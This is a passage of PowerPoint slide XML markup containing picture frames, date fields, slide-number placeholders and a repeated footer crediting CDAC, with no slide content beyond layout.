          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1422400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="10000"/>
              </a:schemeClr>
            </a:solid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10871200" y="0"/>
            <a:ext cx="1320800" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="10000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2119892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73593E-7F28-44E2-939C-51248E1D2BB0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright © 2022                                   Designed and Developed by CDAC </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F785DC4-82D3-4679-9D52-8078977AD7E8}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1368279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F08676-27FB-40BE-A22E-C1CF13632751}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright © 2022                                   Designed and Developed by CDAC </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F785DC4-82D3-4679-9D52-8078977AD7E8}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2176277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FC600F-0EDC-4106-9B93-52364E77412A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright © 2022                                   Designed and Developed by CDAC </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F785DC4-82D3-4679-9D52-8078977AD7E8}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="673551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F1B4C-89DC-43E9-A935-8FC36BCA41A0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright © 2022                                   Designed and Developed by CDAC </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F785DC4-82D3-4679-9D52-8078977AD7E8}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1125134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F7E18A9A-2407-43D1-B8D7-8E42A58E8D44}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright © 2022                                   Designed and Developed by CDAC </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F785DC4-82D3-4679-9D52-8078977AD7E8}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="811068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48963-E80E-47AC-BA2F-6892CFCADFBD}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright © 2022                                   Designed and Developed by CDAC </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F785DC4-82D3-4679-9D52-8078977AD7E8}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2261593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a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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69FB489-FCC5-441C-B288-2281ABDE8D19}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright © 2022                                   Designed and Developed by CDAC </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F785DC4-82D3-4679-9D52-8078977AD7E8}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231075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CC2F0D-F105-4EEF-A2E1-93E7C98E4830}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{78C38012-EF5B-475C-A3D1-2E4681435FEC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68F400BA-AD63-E49E-4417-4B19994086BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4165600" y="6356351"/>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2022                                  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Designed and Developed by CDAC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a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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8D88476-620C-47B3-9AED-86E995D0988F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright © 2022                                   Designed and Developed by CDAC </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F785DC4-82D3-4679-9D52-8078977AD7E8}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1979446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EF25BB-91BF-4C91-B816-888D19038AAA}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright © 2022                                   Designed and Developed by CDAC </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F785DC4-82D3-4679-9D52-8078977AD7E8}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3075409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91F710-172C-40AE-B7C0-FC0F3903E820}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright © 2022                                   Designed and Developed by CDAC </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7F785DC4-82D3-4679-9D52-8078977AD7E8}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147123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77358-520A-4847-89A1-1D02010B754B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{78C38012-EF5B-475C-A3D1-2E4681435FEC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DBA1F6A-5D74-6A0F-0806-6836DBE52604}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4165600" y="6356351"/>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2022                                   Designed and Developed by CDAC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0BF705-B87E-44CF-9F24-E12352D4B00F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{78C38012-EF5B-475C-A3D1-2E4681435FEC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{776BD9B1-9B4A-EED1-19C6-5F366724F2D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4165600" y="6356351"/>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2022                                   Designed and Developed by CDAC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815A1-934F-43E0-A154-695A0BA7A918}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{78C38012-EF5B-475C-A3D1-2E4681435FEC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ACBB5FB-9C18-27A4-E32C-A3835269271F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4165600" y="6356351"/>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2022                                   Designed and Developed by CDAC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546C0E2E-F5B9-4A6F-9C60-D70FBE2E0DCC}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{78C38012-EF5B-475C-A3D1-2E4681435FEC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02B71BB4-9405-9DA3-4CD6-ED246547855A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4165600" y="6356351"/>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2022                                   Designed and Developed by CDAC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A88C7-B9CB-46DD-A668-15AB65B82A7B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{78C38012-EF5B-475C-A3D1-2E4681435FEC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3894CCA-45E4-967B-DAA8-8F3509E3826C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4165600" y="6356351"/>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2022                                   Designed and Developed by CDAC </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8C368-E599-4216-A8E3-A6E1886F76CE}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
